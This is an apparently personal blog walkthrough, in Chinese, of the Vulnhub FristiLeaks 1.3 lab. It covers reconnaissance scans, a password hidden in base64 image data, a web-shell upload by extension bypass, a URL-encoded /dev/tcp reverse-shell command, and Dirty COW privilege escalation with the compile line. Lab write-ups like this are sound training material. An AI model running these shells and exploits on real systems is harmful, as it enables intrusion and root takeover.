Vulnhub--FristiLeaks_1.3 脏牛提权

个人博客WuTongSec

打点

nmap  192.168.128.0/24 --min-rate 10000
nmap  192.168.128.138 -P --min-rate 10000
nikto -h http://192.168.128.138/【oscp考试官方文档里面说可以用这个工具】
dirsearch -u http://192.168.128.138

有的时候 robots.txt 也会泄露一些敏感的路径

但是这里不是 访问每一个都是一样的

这个也没东西

然后我去搜了一下 fristileaks 还以为是个框架 结果不是  看了一下wp 主页面的这个地方路径是后台【真没想到】抽象了有点

抽象的图片藏密码

本来想sql注入 但是这个靶机好像就是专门考图片的

大概意思就是 把图片进行了base64 通过 eezeepz 这个人

这个是查看图片的链接
data:img/png;base64,
下面还有一个图片 直接复制上去，就下载下来了
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

这个性质基本就是密码了 keKkeKKeKKeKkEkkEk 用户名eezeepz

本来还把之前的首页名字拿下来跑字典的多半没用

一句话上传

有上传 先尝试写一句话

刚开始fuzz php的后缀 没有成功

shell.php.png 改成这样直接就行了 解析漏洞 在png里面插入php代码可以被解析

那就直接反弹shell
注意这种反弹shell的命令要编码一下 
base64 或者是 url都可以
%2Fbin%2Fsh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.128.128%2F4444%200%3E%261

提权

suid提权
find / -user root -perm /4000 2>/dev/null   
sudo 提权不行
然后就是看计划任务和网络监听了
netstat -lntp  有mysql 尝试不能登录【而且也不是之前的密码】

内核提权
searchsploit  linux 2.6.32 | grep -i "Privilege Escalation"  【Privilege Escalation】权限提升的意思 
​

第一个10018.sh不行 一直执行

​
sh-4.1$ cat /etc/*-release
cat /etc/*-release
CentOS release 6.7 (Final)
CentOS release 6.7 (Final)
CentOS release 6.7 (Final)
sh-4.1$ uname -a
uname -a
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

这个也不行

试一下 15024.c 也不行

到这里就只有去看wp了，了解到 脏牛提权

脏牛提权

Linux kernel >= 2.6.22 && Linux kernel <= 4.8

脏牛（Dirty COW） 是一个存在于 Linux 内核中的漏洞，它允许普通用户通过竞争条件（race condition）获得对只读内存映射文件的写权限。这个漏洞可以被利用来修改关键系统文件（如 /etc/passwd），从而实现从普通用户到 root 用户的提权。

什么是竞争条件？

竞争条件是指多个进程或线程同时尝试访问和修改共享资源时，可能会导致不可预测的行为。在脏牛漏洞中，两个进程同时操作同一个内存页面，其中一个进程试图读取页面，而另一个进程试图写入页面，这种并发操作可能导致内核错误地处理内存页面的权限，使得只读页面变成可写。

脏牛漏洞的工作原理

1. 内存映射（Memory Mapping）：

   • 当一个文件被映射到内存中时，操作系统会创建一个内存映射区域（memory mapping）。对于只读文件，操作系统通常会使用“写时复制”（Copy-On-Write, COW）机制。这意味着当多个进程共享同一个只读页面时，只有当某个进程尝试写入该页面时，操作系统才会为该进程创建一个新的副本，并允许它进行写操作。

2. 竞争条件：

   • 在脏牛漏洞中，攻击者可以通过快速切换进程的读写操作，触发一个竞争条件。具体来说，攻击者可以在一个进程中不断尝试将只读页面映射为可写页面，同时在另一个进程中频繁地将该页面映射回只读状态。由于内核在处理这些请求时存在一个时间窗口，攻击者有机会在这个窗口内成功将只读页面变为可写页面。

3. 提权过程：

   • 一旦攻击者成功将只读页面变为可写页面，他们就可以修改该页面中的内容。例如，攻击者可以修改 /etc/passwd 文件，添加一个具有 root 权限的新用户，或者修改现有的用户条目以提升权限。

   • 修改完成后，攻击者可以通过 su 或 sudo 命令登录为 root 用户，从而获得系统的完全控制权。

去github上搜了一下https://github.com/firefart/dirtycow/blob/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt

执行脚本后是添加了一个firefart用户 密码是我们自己输入的123
​
standard in must be a tty 
在 Linux 系统中尝试使用 `su` 命令切换用户时，如果遇到错误信息 `"standard in must be a tty"`，这通常是因为 `su` 需要一个终端（TTY）来确保安全交互，例如输入密码。
插件里面也有这些命令

提权成功

总结

脏牛提权【条件竞争】适用版本Linux kernel >= 2.6.22 && Linux kernel <= 4.8

没有思路了就要往图片里面挖一挖

刚开始找exp浪费了太多时间